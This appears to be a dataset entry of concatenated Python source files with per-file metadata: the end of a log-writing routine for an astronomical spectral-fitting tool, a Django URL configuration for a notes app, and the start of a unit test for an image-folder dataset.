logfile.write('\n{0:>30}{1:<2}{2:<30}'.format('max_like_niter',':',str(fit_options['max_like_niter']) ))
logfile.write('\n{0:>30}{1:<2}{2:<30}'.format('output_pars',':',str(fit_options['output_pars']) ))
logfile.write('\n')
# MCMC options
if mcmc_options['mcmc_fit']==False:
logfile.write('\n{0:<30}{1:<30}{2:<30}'.format(' mcmc_options:','',''))
logfile.write('\n{0:>30}{1:<2}{2:<30}'.format('','','MCMC fitting is turned off.' ))
logfile.write('\n')
elif mcmc_options['mcmc_fit']==True:
logfile.write('\n{0:<30}{1:<30}{2:<30}'.format(' mcmc_options:','',''))
logfile.write('\n{0:>30}{1:<2}{2:<30}'.format('mcmc_fit',':',str(mcmc_options['mcmc_fit']) ))
logfile.write('\n{0:>30}{1:<2}{2:<30}'.format('nwalkers',':',str(mcmc_options['nwalkers']) ))
logfile.write('\n{0:>30}{1:<2}{2:<30}'.format('auto_stop',':',str(mcmc_options['auto_stop']) ))
logfile.write('\n{0:>30}{1:<2}{2:<30}'.format('conv_type',':',str(mcmc_options['conv_type']) ))
logfile.write('\n{0:>30}{1:<2}{2:<30}'.format('min_samp',':',str(mcmc_options['min_samp']) ))
logfile.write('\n{0:>30}{1:<2}{2:<30}'.format('ncor_times',':',str(mcmc_options['ncor_times']) ))
logfile.write('\n{0:>30}{1:<2}{2:<30}'.format('autocorr_tol',':',str(mcmc_options['autocorr_tol']) ))
logfile.write('\n{0:>30}{1:<2}{2:<30}'.format('write_iter',':',str(mcmc_options['write_iter']) ))
logfile.write('\n{0:>30}{1:<2}{2:<30}'.format('write_thresh',':',str(mcmc_options['write_thresh']) ))
logfile.write('\n{0:>30}{1:<2}{2:<30}'.format('burn_in',':',str(mcmc_options['burn_in']) ))
logfile.write('\n{0:>30}{1:<2}{2:<30}'.format('min_iter',':',str(mcmc_options['min_iter']) ))
logfile.write('\n{0:>30}{1:<2}{2:<30}'.format('max_iter',':',str(mcmc_options['max_iter']) ))
logfile.write('\n')
# Fit Component options
logfile.write('\n{0:<30}{1:<30}{2:<30}'.format(' comp_options:','',''))
logfile.write('\n{0:>30}{1:<2}{2:<30}'.format('fit_opt_feii',':',str(comp_options['fit_opt_feii']) ))
logfile.write('\n{0:>30}{1:<2}{2:<30}'.format('fit_uv_iron',':',str(comp_options['fit_uv_iron']) ))
logfile.write('\n{0:>30}{1:<2}{2:<30}'.format('fit_balmer',':',str(comp_options['fit_balmer']) ))
logfile.write('\n{0:>30}{1:<2}{2:<30}'.format('fit_losvd',':',str(comp_options['fit_losvd']) ))
logfile.write('\n{0:>30}{1:<2}{2:<30}'.format('fit_host',':',str(comp_options['fit_host']) ))
logfile.write('\n{0:>30}{1:<2}{2:<30}'.format('fit_power',':',str(comp_options['fit_power']) ))
logfile.write('\n{0:>30}{1:<2}{2:<30}'.format('fit_poly',':',str(comp_options['fit_poly']) ))
logfile.write('\n{0:>30}{1:<2}{2:<30}'.format('fit_narrow',':',str(comp_options['fit_narrow']) ))
logfile.write('\n{0:>30}{1:<2}{2:<30}'.format('fit_broad',':',str(comp_options['fit_broad']) ))
logfile.write('\n{0:>30}{1:<2}{2:<30}'.format('fit_outflow',':',str(comp_options['fit_outflow']) ))
logfile.write('\n{0:>30}{1:<2}{2:<30}'.format('fit_absorp',':',str(comp_options['fit_absorp']) ))
logfile.write('\n{0:>30}{1:<2}{2:<30}'.format('tie_line_fwhm',':',str(comp_options['tie_line_fwhm']) ))
logfile.write('\n{0:>30}{1:<2}{2:<30}'.format('tie_line_voff',':',str(comp_options['tie_line_voff']) ))
logfile.write('\n{0:>30}{1:<2}{2:<30}'.format('na_line_profile',':',str(comp_options['na_line_profile']) ))
logfile.write('\n{0:>30}{1:<2}{2:<30}'.format('br_line_profile',':',str(comp_options['br_line_profile']) ))
logfile.write('\n{0:>30}{1:<2}{2:<30}'.format('out_line_profile',':',str(comp_options['out_line_profile']) ))
logfile.write('\n{0:>30}{1:<2}{2:<30}'.format('abs_line_profile',':',str(comp_options['abs_line_profile']) ))
logfile.write('\n')
# LOSVD options
if comp_options["fit_losvd"]==True:
logfile.write('\n{0:<30}{1:<30}{2:<30}'.format(' losvd_options:','',''))
logfile.write('\n{0:>30}{1:<2}{2:<30}'.format('library',':',str(losvd_options['library']) ))
logfile.write('\n{0:>30}{1:<2}{2:<30}'.format('vel_const',':',str(losvd_options['vel_const']) ))
logfile.write('\n{0:>30}{1:<2}{2:<30}'.format('disp_const',':',str(losvd_options['disp_const']) ))
logfile.write('\n')
elif comp_options["fit_losvd"]==False:
logfile.write('\n{0:<30}{1:<30}{2:<30}'.format(' losvd_options:','',''))
logfile.write('\n{0:>30}{1:<2}{2:<30}'.format('','','Stellar LOSVD fitting is turned off.' ))
logfile.write('\n')
# Host Options
if comp_options["fit_host"]==True:
logfile.write('\n{0:<30}{1:<30}{2:<30}'.format(' host_options:','',''))
logfile.write('\n{0:>30}{1:<2}{2:<30}'.format('age',':',str(host_options['age']) ))
logfile.write('\n{0:>30}{1:<2}{2:<30}'.format('vel_const',':',str(host_options['vel_const']) ))
logfile.write('\n{0:>30}{1:<2}{2:<30}'.format('disp_const',':',str(host_options['disp_const']) ))
logfile.write('\n')
elif comp_options["fit_host"]==False:
logfile.write('\n{0:<30}{1:<30}{2:<30}'.format(' host_options:','',''))
logfile.write('\n{0:>30}{1:<2}{2:<30}'.format('','','Host-galaxy template component is turned off.' ))
logfile.write('\n')
# Power-law continuum options
if comp_options['fit_power']==True:
logfile.write('\n{0:<30}{1:<30}{2:<30}'.format(' power_options:','',''))
logfile.write('\n{0:>30}{1:<2}{2:<30}'.format('type',':',str(power_options['type']) ))
logfile.write('\n')
elif comp_options["fit_power"]==False:
logfile.write('\n{0:<30}{1:<30}{2:<30}'.format(' power_options:','',''))
logfile.write('\n{0:>30}{1:<2}{2:<30}'.format('','','Power Law component is turned off.' ))
logfile.write('\n')
# Polynomial continuum options
if comp_options['fit_poly']==True:
logfile.write('\n{0:<30}{1:<30}{2:<30}'.format(' poly_options:','',''))
logfile.write('\n{0:>30}{1:<2}{2:<100}'.format('ppoly',':','bool: %s, order: %s' % (str(poly_options['ppoly']['bool']),str(poly_options['ppoly']['order']) )))
logfile.write('\n{0:>30}{1:<2}{2:<100}'.format('apoly',':','bool: %s, order: %s' % (str(poly_options['apoly']['bool']),str(poly_options['apoly']['order']),)))
logfile.write('\n{0:>30}{1:<2}{2:<100}'.format('mpoly',':','bool: %s, order: %s' % (str(poly_options['mpoly']['bool']),str(poly_options['mpoly']['order']),)))
logfile.write('\n')
elif comp_options["fit_poly"]==False:
logfile.write('\n{0:<30}{1:<30}{2:<30}'.format(' poly_options:','',''))
logfile.write('\n{0:>30}{1:<2}{2:<30}'.format('','','Polynomial continuum component is turned off.' ))
logfile.write('\n')
# Optical FeII fitting options
if (comp_options['fit_opt_feii']==True):
logfile.write('\n{0:<30}{1:<30}{2:<30}'.format(' opt_feii_options:','',''))
if (comp_options['fit_opt_feii']==True) and (opt_feii_options['opt_template']['type']=='VC04'):
logfile.write('\n{0:>30}{1:<2}{2:<100}'.format('opt_template:',':','type: %s' % str(opt_feii_options['opt_template']['type']) ))
logfile.write('\n{0:>30}{1:<2}{2:<100}'.format('opt_amp_const',':','bool: %s, br_opt_feii_val: %s, na_opt_feii_val: %s' % (str(opt_feii_options['opt_amp_const']['bool']),str(opt_feii_options['opt_amp_const']['br_opt_feii_val']),str(opt_feii_options['opt_amp_const']['na_opt_feii_val']))))
logfile.write('\n{0:>30}{1:<2}{2:<100}'.format('opt_fwhm_const',':','bool: %s, br_opt_feii_val: %s, na_opt_feii_val: %s' % (str(opt_feii_options['opt_fwhm_const']['bool']),str(opt_feii_options['opt_fwhm_const']['br_opt_feii_val']),str(opt_feii_options['opt_fwhm_const']['na_opt_feii_val']))))
logfile.write('\n{0:>30}{1:<2}{2:<100}'.format('opt_voff_const',':','bool: %s, br_opt_feii_val: %s, na_opt_feii_val: %s' % (str(opt_feii_options['opt_voff_const']['bool']),str(opt_feii_options['opt_voff_const']['br_opt_feii_val']),str(opt_feii_options['opt_voff_const']['na_opt_feii_val']))))
if (comp_options['fit_opt_feii']==True) and (opt_feii_options['opt_template']['type']=='K10'):
logfile.write('\n{0:>30}{1:<2}{2:<100}'.format('opt_template:',':','type: %s' % str(opt_feii_options['opt_template']['type']) ))
logfile.write('\n{0:>30}{1:<2}{2:<100}'.format('opt_amp_const',':','bool: %s, f_feii_val: %s, s_feii_val: %s, g_feii_val: %s, z_feii_val: %s' % (str(opt_feii_options['opt_amp_const']['bool']),str(opt_feii_options['opt_amp_const']['f_feii_val']),str(opt_feii_options['opt_amp_const']['s_feii_val']),str(opt_feii_options['opt_amp_const']['g_feii_val']),str(opt_feii_options['opt_amp_const']['z_feii_val']))))
logfile.write('\n{0:>30}{1:<2}{2:<100}'.format('opt_fwhm_const',':','bool: %s, opt_feii_val: %s' % (str(opt_feii_options['opt_fwhm_const']['bool']),str(opt_feii_options['opt_fwhm_const']['opt_feii_val']),)))
logfile.write('\n{0:>30}{1:<2}{2:<100}'.format('opt_voff_const',':','bool: %s, opt_feii_val: %s' % (str(opt_feii_options['opt_voff_const']['bool']),str(opt_feii_options['opt_voff_const']['opt_feii_val']),)))
logfile.write('\n{0:>30}{1:<2}{2:<100}'.format('opt_temp_const',':','bool: %s, opt_feii_val: %s' % (str(opt_feii_options['opt_temp_const']['bool']),str(opt_feii_options['opt_temp_const']['opt_feii_val']),)))
elif comp_options["fit_opt_feii"]==False:
logfile.write('\n{0:<30}{1:<30}{2:<30}'.format(' opt_feii_options:','',''))
logfile.write('\n{0:>30}{1:<2}{2:<30}'.format('','','Optical FeII fitting is turned off.' ))
logfile.write('\n')
# UV Iron options
if (comp_options['fit_uv_iron']==True):
logfile.write('\n{0:<30}{1:<30}{2:<30}'.format(' uv_iron_options:','',''))
logfile.write('\n{0:>30}{1:<2}{2:<100}'.format('uv_amp_const',':','bool: %s, uv_iron_val: %s' % (str(uv_iron_options['uv_amp_const']['bool']),str(uv_iron_options['uv_amp_const']['uv_iron_val']) )))
logfile.write('\n{0:>30}{1:<2}{2:<100}'.format('uv_fwhm_const',':','bool: %s, uv_iron_val: %s' % (str(uv_iron_options['uv_fwhm_const']['bool']),str(uv_iron_options['uv_fwhm_const']['uv_iron_val']),)))
logfile.write('\n{0:>30}{1:<2}{2:<100}'.format('uv_voff_const',':','bool: %s, uv_iron_val: %s' % (str(uv_iron_options['uv_voff_const']['bool']),str(uv_iron_options['uv_voff_const']['uv_iron_val']),)))
elif comp_options["fit_uv_iron"]==False:
logfile.write('\n{0:<30}{1:<30}{2:<30}'.format(' uv_iron_options:','',''))
logfile.write('\n{0:>30}{1:<2}{2:<30}'.format('','','UV Iron fitting is turned off.' ))
logfile.write('\n')
# Balmer options
if (comp_options['fit_balmer']==True):
logfile.write('\n{0:<30}{1:<30}{2:<30}'.format(' balmer_options:','',''))
logfile.write('\n{0:>30}{1:<2}{2:<100}'.format('R_const',':','bool: %s, R_val: %s' % (str(balmer_options['R_const']['bool']),str(balmer_options['R_const']['R_val']) )))
logfile.write('\n{0:>30}{1:<2}{2:<100}'.format('balmer_amp_const',':','bool: %s, balmer_amp_val: %s' % (str(balmer_options['balmer_amp_const']['bool']),str(balmer_options['balmer_amp_const']['balmer_amp_val']),)))
logfile.write('\n{0:>30}{1:<2}{2:<100}'.format('balmer_fwhm_const',':','bool: %s, balmer_fwhm_val: %s' % (str(balmer_options['balmer_fwhm_const']['bool']),str(balmer_options['balmer_fwhm_const']['balmer_fwhm_val']),)))
logfile.write('\n{0:>30}{1:<2}{2:<100}'.format('balmer_voff_const',':','bool: %s, balmer_voff_val: %s' % (str(balmer_options['balmer_voff_const']['bool']),str(balmer_options['balmer_voff_const']['balmer_voff_val']),)))
logfile.write('\n{0:>30}{1:<2}{2:<100}'.format('Teff_const',':','bool: %s, Teff_val: %s' % (str(balmer_options['Teff_const']['bool']),str(balmer_options['Teff_const']['Teff_val']),)))
logfile.write('\n{0:>30}{1:<2}{2:<100}'.format('tau_const',':','bool: %s, tau_val: %s' % (str(balmer_options['tau_const']['bool']),str(balmer_options['tau_const']['tau_val']),)))
elif comp_options["fit_balmer"]==False:
logfile.write('\n{0:<30}{1:<30}{2:<30}'.format(' balmer_options:','',''))
logfile.write('\n{0:>30}{1:<2}{2:<30}'.format('','','Balmer pseudo-continuum fitting is turned off.' ))
logfile.write('\n')
# Plotting options
logfile.write('\n{0:<30}{1:<30}{2:<30}'.format(' plot_options:','',''))
logfile.write('\n{0:>30}{1:<2}{2:<30}'.format('plot_param_hist',':',str(plot_options['plot_param_hist']) ))
logfile.write('\n{0:>30}{1:<2}{2:<30}'.format('plot_flux_hist',':',str(plot_options['plot_flux_hist']) ))
logfile.write('\n{0:>30}{1:<2}{2:<30}'.format('plot_lum_hist',':',str(plot_options['plot_lum_hist']) ))
logfile.write('\n{0:>30}{1:<2}{2:<30}'.format('plot_eqwidth_hist',':',str(plot_options['plot_eqwidth_hist']) ))
# Output options
logfile.write('\n{0:<30}{1:<30}{2:<30}'.format(' output_options:','',''))
logfile.write('\n{0:>30}{1:<2}{2:<30}'.format('write_chain',':',str(output_options['write_chain']) ))
logfile.write('\n{0:>30}{1:<2}{2:<30}'.format('verbose',':',str(output_options['verbose']) ))
#
logfile.write('\n')
logfile.write('\n-----------------------------------------------------------------------------------------------------------------')
return None
if (output_type=='update_opt_feii'):
with log_file_path.open(mode='a') as logfile:
logfile.write('\n')
logfile.write('\n * optical FeII templates outside of fitting region and disabled.')
return None
if (output_type=='update_uv_iron'):
with log_file_path.open(mode='a') as logfile:
logfile.write('\n')
logfile.write('\n * UV iron template outside of fitting region and disabled.')
return None
if (output_type=='update_balmer'):
with log_file_path.open(mode='a') as logfile:
logfile.write('\n')
logfile.write('\n * Balmer continuum template outside of fitting region and disabled.')
return None
if (output_type=='output_line_list'):
line_list, param_dict, soft_cons = output_val
with log_file_path.open(mode='a') as logfile:
logfile.write("\n----------------------------------------------------------------------------------------------------------------------------------------")
logfile.write("\n Line List:")
nfree = 0
logfile.write("\n----------------------------------------------------------------------------------------------------------------------------------------")
for line in sorted(list(line_list)):
logfile.write("\n{0:<30}{1:<30}{2:<30.2}".format(line, '',''))
for par in sorted(list(line_list[line])):
logfile.write("\n{0:<30}{1:<30}{2:<30}".format('', par,str(line_list[line][par])))
if line_list[line][par]=="free": nfree+=1
logfile.write("\n----------------------------------------------------------------------------------------------------------------------------------------")
logfile.write("\n Soft Constraints:\n")
for con in soft_cons:
logfile.write("\n{0:>30}{1:<0}{2:<0}".format(con[0], ' > ',con[1]))
logfile.write("\n----------------------------------------------------------------------------------------------------------------------------------------")
return None
if (output_type=='no_line_test'):
rdict = output_val
with log_file_path.open(mode='a') as logfile:
logfile.write('\n')
logfile.write('\n### No-Line Model Fitting Results ###')
logfile.write('\n-----------------------------------------------------------------------------------------------------------------')
logfile.write('\n{0:<30}{1:<30}{2:<30}{3:<30}'.format('Parameter','Best-fit Value','+/- 1-sigma','Flag'))
logfile.write('\n-----------------------------------------------------------------------------------------------------------------')
# Sort into arrays
pname = []
med = []
std = []
flag = []
for key in rdict:
pname.append(key)
med.append(rdict[key]['med'])
std.append(rdict[key]['std'])
flag.append(rdict[key]['flag'])
i_sort = np.argsort(pname)
pname = np.array(pname)[i_sort]
med = np.array(med)[i_sort]
std = np.array(std)[i_sort]
flag = np.array(flag)[i_sort]
for i in range(0,len(pname),1):
logfile.write('\n{0:<30}{1:<30.4f}{2:<30.4f}{3:<30}'.format(pname[i], med[i], std[i], flag[i]))
logfile.write('\n-----------------------------------------------------------------------------------------------------------------')
return None
if (output_type=='line_test'):
rdict = output_val
with log_file_path.open(mode='a') as logfile:
logfile.write('\n')
logfile.write('\n### Line Model Fitting Results ###')
logfile.write('\n-----------------------------------------------------------------------------------------------------------------')
logfile.write('\n{0:<30}{1:<30}{2:<30}{3:<30}'.format('Parameter','Best-fit Value','+/- 1-sigma','Flag'))
logfile.write('\n-----------------------------------------------------------------------------------------------------------------')
# Sort into arrays
pname = []
med = []
std = []
flag = []
for key in rdict:
pname.append(key)
med.append(rdict[key]['med'])
std.append(rdict[key]['std'])
flag.append(rdict[key]['flag'])
i_sort = np.argsort(pname)
pname = np.array(pname)[i_sort]
med = np.array(med)[i_sort]
std = np.array(std)[i_sort]
flag = np.array(flag)[i_sort]
for i in range(0,len(pname),1):
logfile.write('\n{0:<30}{1:<30.4f}{2:<30.4f}{3:<30}'.format(pname[i], med[i], std[i], flag[i]))
logfile.write('\n-----------------------------------------------------------------------------------------------------------------')
return None
if (output_type=='line_test_stats'):
(pval, pval_upp, pval_low, conf, conf_upp, conf_low, dist, disp, signif, overlap,
f_conf,f_conf_err,f_stat,f_stat_err,f_pval,f_pval_err,
chi2_ratio,chi2_ratio_err,chi2_no_line,chi2_no_line_err,chi2_line,chi2_line_err,
# amp_metric,fwhm_metric,voff_metric,voff_metric_err,
ssr_ratio,ssr_ratio_err,ssr_no_line,ssr_no_line_err,ssr_line,ssr_line_err,
median_noise, median_noise_err,
total_resid_noise,total_resid_noise_err,resid_noise_no_line,resid_noise_no_line_err,resid_noise_line,resid_noise_line_err) = output_val
with log_file_path.open(mode='a') as logfile:
logfile.write('\n')
# logfile.write('-----------------------------------------------------------------------------------------------------')
logfile.write('\n Line Test Statistics:')
logfile.write('\n-----------------------------------------------------------------------------------------------------')
logfile.write('\n{0:<30}{1:<30}{2:<30}{3:<30}'.format('','Statistic','Value','Uncertainty') )
logfile.write('\n-----------------------------------------------------------------------------------------------------')
logfile.write('\n{0:<30}'.format('A/B Likelihood Test::'))
logfile.write('\n{0:<30}{1:<30}{2:<30.6f}{3:<30}'.format('','Confidence:',conf,"(-%0.6f,+%0.6f)" % (conf_low,conf_upp )) )
logfile.write('\n{0:<30}{1:<30}{2:<30.6f}{3:<30}'.format('','p-value:',pval,"(-%0.6f,+%0.6f)" % (pval_low,pval_upp)))
logfile.write('\n{0:<30}{1:<30}{2:<30.6f}'.format('','Statistical Distance:',dist))
logfile.write('\n{0:<30}{1:<30}{2:<30.6f}'.format('','Disperson:',disp))
logfile.write('\n{0:<30}{1:<30}{2:<30.6f}'.format('','Significance (sigma):',signif))
logfile.write('\n{0:<30}{1:<30}{2:<30.6f}'.format('','Overlap (1-sigma):',overlap))
logfile.write('\n{0:<30}'.format('ANOVA (F-test):'))
logfile.write('\n{0:<30}{1:<30}{2:<30.4f}{3:<30.4f}'.format('','Confidence:',f_conf, f_conf_err ) )
logfile.write('\n{0:<30}{1:<30}{2:<30.4f}{3:<30.4f}'.format('','F-statistic:',f_stat,f_stat_err))
logfile.write('\n{0:<30}{1:<30}{2:<30.4e}{3:<30.4e}'.format('','p-value:',f_pval,f_pval_err))
logfile.write('\n{0:<30}'.format('Chi-Squared Metrics:'))
logfile.write('\n{0:<30}{1:<30}{2:<30.6f}{3:<30.6f}'.format('','Chi-squared Ratio:',chi2_ratio, chi2_ratio_err ) )
logfile.write('\n{0:<30}{1:<30}{2:<30.6f}{3:<30.6f}'.format('','Chi-squared no-line:',chi2_no_line,chi2_no_line_err))
logfile.write('\n{0:<30}{1:<30}{2:<30.6f}{3:<30.6f}'.format('','Chi-squared line:',chi2_line,chi2_line_err))
logfile.write('\n{0:<30}'.format('Sum-of-Squares of Residuals (SSR):'))
logfile.write('\n{0:<30}{1:<30}{2:<30.6f}{3:<30.6f}'.format('','SSR ratio:',ssr_ratio,ssr_ratio_err))
logfile.write('\n{0:<30}{1:<30}{2:<30.6f}{3:<30.6f}'.format('','SSR no-line:',ssr_no_line,ssr_no_line_err))
logfile.write('\n{0:<30}{1:<30}{2:<30.6f}{3:<30.6f}'.format('','SSR line:',ssr_line,ssr_line_err))
logfile.write('\n{0:<30}'.format('Residual Noise:'))
logfile.write('\n{0:<30}{1:<30}{2:<30.6f}{3:<30.6f}'.format('','Median spec noise:',median_noise, median_noise_err))
logfile.write('\n{0:<30}{1:<30}{2:<30.6f}{3:<30.6f}'.format('','Total resid noise:',total_resid_noise,total_resid_noise_err))
logfile.write('\n{0:<30}{1:<30}{2:<30.6f}{3:<30.6f}'.format('','no-line resid:',resid_noise_no_line,resid_noise_no_line_err))
logfile.write('\n{0:<30}{1:<30}{2:<30.6f}{3:<30.6f}'.format('','line resid:',resid_noise_line,resid_noise_line_err))
logfile.write('\n-----------------------------------------------------------------------------------------------------')
return None
# Maximum likelihood/Initial parameters
if (output_type=='max_like_fit'):
pdict,noise_std,resid_std = output_val
with log_file_path.open(mode='a') as logfile:
logfile.write('\n')
logfile.write('\n### Maximum Likelihood Fitting Results ###')
logfile.write('\n-----------------------------------------------------------------------------------------------------------------')
if "std" in pdict[list(pdict.keys())[0]]:
logfile.write('\n{0:<30}{1:<30}{2:<30}{3:<30}'.format('Parameter','Max. Like. Value','+/- 1-sigma', 'Flag') )
else:
logfile.write('\n{0:<30}{1:<30}'.format('Parameter','Max. Like. Value') )
logfile.write('\n-----------------------------------------------------------------------------------------------------------------')
# Sort into arrays
pname = []
med = []
std = []
flag = []
for key in pdict:
pname.append(key)
med.append(pdict[key]['med'])
if "std" in pdict[list(pdict.keys())[0]]:
std.append(pdict[key]['std'])
flag.append(pdict[key]['flag'])
i_sort = np.argsort(pname)
pname = np.array(pname)[i_sort]
med = np.array(med)[i_sort]
if "std" in pdict[list(pdict.keys())[0]]:
std = np.array(std)[i_sort]
flag = np.array(flag)[i_sort]
for i in range(0,len(pname),1):
if "std" in pdict[list(pdict.keys())[0]]:
logfile.write('\n{0:<30}{1:<30.4f}{2:<30.4f}{3:<30}'.format(pname[i], med[i], std[i], flag[i]))
else:
logfile.write('\n{0:<30}{1:<30.4f}'.format(pname[i], med[i]))
logfile.write('\n{0:<30}{1:<30.4f}'.format('NOISE_STD.', noise_std ))
logfile.write('\n{0:<30}{1:<30.4f}'.format('RESID_STD', resid_std ))
logfile.write('\n-----------------------------------------------------------------------------------------------------------------')
return None
# run_emcee
if (output_type=='emcee_options'): # write user input emcee options
ndim,nwalkers,auto_stop,conv_type,burn_in,write_iter,write_thresh,min_iter,max_iter = output_val
# write_log((ndim,nwalkers,auto_stop,burn_in,write_iter,write_thresh,min_iter,max_iter),40)
a = str(datetime.datetime.now())
with log_file_path.open(mode='a') as logfile:
logfile.write('\n')
logfile.write('\n### Emcee Options ###')
logfile.write('\n-----------------------------------------------------------------------------------------------------------------')
logfile.write('\n{0:<30}{1:<30}'.format('ndim' , ndim ))
logfile.write('\n{0:<30}{1:<30}'.format('nwalkers' , nwalkers ))
logfile.write('\n{0:<30}{1:<30}'.format('auto_stop' , str(auto_stop) ))
logfile.write('\n{0:<30}{1:<30}'.format('user burn_in', burn_in ))
logfile.write('\n{0:<30}{1:<30}'.format('write_iter' , write_iter ))
logfile.write('\n{0:<30}{1:<30}'.format('write_thresh', write_thresh ))
logfile.write('\n{0:<30}{1:<30}'.format('min_iter' , min_iter ))
logfile.write('\n{0:<30}{1:<30}'.format('max_iter' , max_iter ))
logfile.write('\n{0:<30}{1:<30}'.format('start_time' , a ))
logfile.write('\n-----------------------------------------------------------------------------------------------------------------')
return None
if (output_type=='autocorr_options'): # write user input auto_stop options
min_samp,autocorr_tol,ncor_times,conv_type = output_val
with log_file_path.open(mode='a') as logfile:
# write_log((min_samp,tol,ntol,atol,ncor_times,conv_type),41,run_dir)
logfile.write('\n')
logfile.write('\n### Autocorrelation Options ###')
logfile.write('\n-----------------------------------------------------------------------------------------------------------------')
logfile.write('\n{0:<30}{1:<30}'.format('min_samp' , min_samp ))
logfile.write('\n{0:<30}{1:<30}'.format('tolerance%', autocorr_tol ))
logfile.write('\n{0:<30}{1:<30}'.format('ncor_times', ncor_times ))
logfile.write('\n{0:<30}{1:<30}'.format('conv_type' , str(conv_type) ))
logfile.write('\n-----------------------------------------------------------------------------------------------------------------')
return None
if (output_type=='autocorr_results'): # write autocorrelation results to log
# write_log((k+1,burn_in,stop_iter,param_names,tau),42,run_dir)
burn_in,stop_iter,param_names,tau,autocorr_tol,tol,ncor_times = output_val
with log_file_path.open(mode='a') as logfile:
# write_log((min_samp,tol,ntol,atol,ncor_times,conv_type),41,run_dir)
i_sort = np.argsort(param_names)
param_names = np.array(param_names)[i_sort]
tau = np.array(tau)[i_sort]
tol = np.array(tol)[i_sort]
logfile.write('\n')
logfile.write('\n### Autocorrelation Results ###')
logfile.write('\n-----------------------------------------------------------------------------------------------------------------')
logfile.write('\n{0:<30}{1:<30}'.format('conv iteration', burn_in ))
logfile.write('\n{0:<30}{1:<30}'.format('stop iteration', stop_iter ))
logfile.write('\n-----------------------------------------------------------------------------------------------------------------')
logfile.write('\n{0:<30}{1:<30}{2:<30}{3:<30}{4:<30}'.format('Parameter','Autocorr. Time','Target Autocorr. Time','Tolerance','Converged?'))
logfile.write('\n-----------------------------------------------------------------------------------------------------------------')
for i in range(0,len(param_names),1):
if (burn_in > (tau[i]*ncor_times)) and (0 < tol[i] < autocorr_tol):
c = 'True'
elif (burn_in < (tau[i]*ncor_times)) or (tol[i]>= 0.0):
c = 'False'
else:
c = 'False'
logfile.write('\n{0:<30}{1:<30.5f}{2:<30.5f}{3:<30.5f}{4:<30}'.format(param_names[i],tau[i],(tau[i]*ncor_times),tol[i],c))
logfile.write('\n-----------------------------------------------------------------------------------------------------------------')
return None
if (output_type=='emcee_time'): # write autocorrelation results to log
# write_log(run_time,43,run_dir)
run_time = output_val
a = str(datetime.datetime.now())
with log_file_path.open(mode='a') as logfile:
# write_log((min_samp,tol,ntol,atol,ncor_times,conv_type),41,run_dir)
logfile.write('\n{0:<30}{1:<30}'.format('end_time', a ))
logfile.write('\n{0:<30}{1:<30}'.format('emcee_runtime',run_time ))
logfile.write('\n-----------------------------------------------------------------------------------------------------------------')
return None
if (output_type=='emcee_results'): # write best fit parameters results to log
par_names,par_best,ci_68_low,ci_68_upp,ci_95_low,ci_95_upp,mean,std_dev,median,med_abs_dev,flags = output_val
# write_log((par_names,par_best,sig_low,sig_upp),50,run_dir)
with log_file_path.open(mode='a') as logfile:
logfile.write('\n')
logfile.write('\n### Best-fit Parameters & Uncertainties ###')
logfile.write('\n-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------')
logfile.write('\n{0:<30}{1:<16}{2:<16}{3:<16}{4:<16}{5:<16}{6:<16}{7:<16}{8:<16}{9:<16}{10:<16}'.format('Parameter','Best-fit Value','68% CI low','68% CI upp','95% CI low','95% CI upp','Mean','Std. Dev.','Median','Med. Abs. Dev.','Flag'))
logfile.write('\n-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------')
for par in range(0,len(par_names),1):
logfile.write('\n{0:<30}{1:<16.5f}{2:<16.5f}{3:<16.5f}{4:<16.5f}{5:<16.5f}{6:<16.5f}{7:<16.5f}{8:<16.5f}{9:<16.5f}{10:<16.5f}'.format(par_names[par],par_best[par],ci_68_low[par],ci_68_upp[par],ci_95_low[par],ci_95_upp[par],mean[par],std_dev[par],median[par],med_abs_dev[par],flags[par]))
logfile.write('\n-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------')
return None
# Total runtime
if (output_type=='total_time'): # write total time to log
# write_log(run_time,43,run_dir)
tot_time = output_val
a = str(datetime.datetime.now())
with log_file_path.open(mode='a') as logfile:
# write_log((min_samp,tol,ntol,atol,ncor_times,conv_type),41,run_dir)
logfile.write('\n{0:<30}{1:<30}'.format('total_runtime',time_convert(tot_time) ))
logfile.write('\n{0:<30}{1:<30}'.format('end_time',a ))
logfile.write('\n-----------------------------------------------------------------------------------------------------------------')
return None
return None
##################################################################################
| 52.703284
| 422
| 0.555167
|
17242f4e9686c30f4fa1ca40ff3bf0ed67f7aaa3
| 409
|
py
|
Python
|
django/notes/usr/urls.py
|
AgbaD/apis
|
e88ecd11820651c8fa5d670ed21ca55ebd8877c2
|
[
"MIT"
] | null | null | null |
django/notes/usr/urls.py
|
AgbaD/apis
|
e88ecd11820651c8fa5d670ed21ca55ebd8877c2
|
[
"MIT"
] | null | null | null |
django/notes/usr/urls.py
|
AgbaD/apis
|
e88ecd11820651c8fa5d670ed21ca55ebd8877c2
|
[
"MIT"
] | null | null | null |
from django.urls import path
from . import views
urlpatterns = [
path('dash/', views.dash, name='dash'),
path('personal_notes/', views.get_private_notes, name='get_private_notes'),
path('create_note/', views.create_note, name='create_note'),
path('delete_note/<str:public_id>/', views.delete_note, name='delete_note'),
path('get_note/<str:public_id>/', views.get_note, name='get_note')
]
| 37.181818
| 80
| 0.706601
|
cad19e5fa77ba7ef46bd852d8a0971021c7824de
| 4,123
|
py
|
Python
|
exercise_03/exercise_code/tests/image_folder_dataset_tests.py
|
stanley-chang/I2DL
|
78740460e1f52ce7643358fc548281f1bbe73a42
|
[
"RSA-MD"
] | 1
|
2021-03-14T20:39:06.000Z
|
2021-03-14T20:39:06.000Z
|
exercise2/exercise_04/exercise_code/tests/image_folder_dataset_tests.py
|
UtkarshTrehan-icloud/I2DL-TUM
|
7624ce84eebfd125f7c08bcb0b87cf25ba2e984c
|
[
"MIT"
] | null | null | null |
exercise2/exercise_04/exercise_code/tests/image_folder_dataset_tests.py
|
UtkarshTrehan-icloud/I2DL-TUM
|
7624ce84eebfd125f7c08bcb0b87cf25ba2e984c
|
[
"MIT"
] | null | null | null |
"""Tests for ImageFolderDataset in data/image_folder_dataset.py"""
import random
from .base_tests import UnitTest, MethodTest, ClassTest, test_results_to_score
from .len_tests import LenTest
class MakeDatasetTestImageType(UnitTest):
"""Test whether make_dataset() loads paths only and not actual images"""
def __init__(self, dataset):
self.dataset = dataset
self.image_type = str
self.wrong_image_type = None
def test(self):
images, _ = self.dataset.make_dataset(
directory=self.dataset.root_path,
class_to_idx=self.dataset.class_to_idx,
)
assert len(images) > 100
